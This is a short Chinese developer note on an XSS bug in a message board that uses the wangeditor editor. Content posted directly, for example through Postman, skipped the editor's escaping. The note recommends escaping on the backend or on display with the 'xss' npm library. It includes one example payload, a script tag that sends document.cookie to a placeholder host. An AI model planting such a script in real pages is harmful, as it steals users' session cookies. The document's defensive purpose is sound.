bug-xss 攻击漏洞问题

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击：通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论，评论内容包含恶意脚本：

<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时，就会触发响应，将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器，正常情况下编辑器都会把内容进行转码处理，转码之后就回避xss问题，这次的问题是通过一些手段提及内容（比如postman），这样提交的代码就没有经过编辑器进行转码，读取数据时就会触发恶意代码。

解决方法

1. 方法一：后端拿到数据后，再进行一次转码，保障进入数据库的内容是转码后的；
2. 方法二：读取后端数据后，对要展示的数据再进行一次转码，相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码